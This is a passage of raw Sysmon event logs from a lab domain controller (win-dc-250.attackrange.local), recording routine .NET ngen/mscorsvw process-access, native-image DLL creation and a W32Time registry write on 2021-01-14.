L+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.950{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4687-6000-7904-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.950{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4687-6000-7904-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.762{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4687-6000-7804-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.747{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4687-6000-7804-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.747{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4687-6000-7804-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:31.684{08A6967A-4687-6000-7704-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10c8-0\System.IdentityModel.Selectors.dll2021-01-14 13:26:31.684 10341000x80000000000000008626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.543{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4687-6000-7704-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.528{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4687-6000-7704-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.528{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4687-6000-7704-000000009A01}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.403{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4687-6000-7604-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.387{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4687-6000-7604-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:31.387{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4687-6000-7604-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:31.262{08A6967A-4685-6000-7504-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1348-0\System.IdentityModel.dll2021-01-14 13:26:31.262 10341000x80000000000000008652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.950{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4688-6000-7E04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.934{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4688-6000-7E04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.934{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4688-6000-7E04-000000009A01}2300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:32.872{08A6967A-4688-6000-7D04-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dd0-0\System.IO.Compression.FileSystem.dll2021-01-14 13:26:32.872 10341000x80000000000000008648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.825{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4688-6000-7D04-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.809{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4688-6000-7D04-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.809{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4688-6000-7D04-000000009A01}3536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.700{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4688-6000-7C04-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.684{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4688-6000-7C04-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.684{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4688-6000-7C04-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:32.622{08A6967A-4688-6000-7B04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\System.IO.Compression.dll2021-01-14 13:26:32.622 13241300x80000000000000008641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:26:32.559{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0xdfcad9a9) 10341000x80000000000000008640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.512{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4688-6000-7B04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.497{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4688-6000-7B04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 